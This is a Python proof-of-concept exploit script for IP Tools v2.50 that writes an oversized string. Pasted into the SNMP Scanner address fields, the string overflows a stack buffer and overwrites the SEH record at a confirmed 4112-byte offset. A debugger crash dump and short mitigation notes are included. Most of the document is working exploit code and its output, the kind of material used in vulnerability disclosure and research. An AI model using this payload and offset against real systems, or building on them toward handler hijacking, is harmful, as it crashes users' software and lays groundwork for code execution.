#!/usr/bin/env python
# Exploit Title: IP TOOLS v2.50 - Denial of Service (PoC) and SEH overwritten Crash PoC
# Discovery by: Rafael Pedrero
# Discovery Date: 2018-12-20
# Vendor Homepage: https://www.ks-soft.net/ip-tools.eng/index.htm
# Software Link : https://www.ks-soft.net/ip-tools.eng/index.htm / https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe
# Tested Version: 2.50
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
#
# Steps to reproduce the crash:
# 1. Run IP-Tools.exe
# 2. Go to the SNMP Scanner tab and copy the content of IPTools_Crash.txt to the clipboard
# 3. Paste the content into the fields 'From Addr' and 'To Addr'
# 4. Click the 'Start' button; the application crashes.
'''Crash reproducer for the IP-Tools 2.50 SNMP Scanner address fields.

Writes IPTools_Crash.txt containing a single 5000-byte ASCII string: 4112
filler bytes, two 4-byte markers ("BBBB" and "CCCC"), and 'D' padding up to
the total length. In the debugger capture below the SEH record at 0012F4B4
holds 42424242 / 43434343 -- the two markers -- so the next-SEH pointer sits
4112 bytes into the input and the handler pointer 4 bytes after it, while the
'D' padding is visible in EDX and at EBP. The root cause is presumably a copy
of the address field into a fixed-size stack buffer without a length check
(not visible from here; inferred from the dump).

Detection / mitigation notes: the observable symptom is a crash of
IP-TOOLS.exe with EIP 00403F70 and a corrupted SEH chain after pasting an
oversized value into the SNMP Scanner address fields. Bounding the field
length at input time removes the overflow; SafeSEH/DEP would keep a corrupted
handler pointer from being dispatched.

Debugger state at the crash (Windows XP SP3, register strings truncated):

SEH chain of main thread
Address    SE handler
0012F4B4   43434343
42424242   *** CORRUPT ENTRY ***

EAX 0012F4CC
ECX 00000000
EDX 44444444
EBX 0012F4CC
ESP 0012E490
EBP 0012F4DC ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
ESI 0012E4A4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
EDI 02256720 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
EIP 00403F70 IP-TOOLS.00403F70
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDD000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty  ST1 empty  ST2 empty  ST3 empty
ST4 empty  ST5 empty  ST6 empty  ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
'''

SEH_OFFSET = 4112             # filler bytes before the SEH record is reached
TOTAL_LENGTH = 5000           # size of the generated input, in bytes
MARKER_BYTES = 8              # "BBBB" + "CCCC"
OUTPUT_FILE = "IPTools_Crash.txt"

# Filler up to the SEH record, a marker for the next-SEH pointer, a marker for
# the handler pointer, then 'D' padding so the whole string is TOTAL_LENGTH.
junk = "A" * SEH_OFFSET
padding = "D" * (TOTAL_LENGTH - len(junk) - MARKER_BYTES)
crash = "".join([junk, "BBBB", "CCCC", padding])

# Text mode, as in the original; the content is pure ASCII so no translation
# of the bytes occurs on write.
with open(OUTPUT_FILE, "w") as handle:
    handle.write(crash)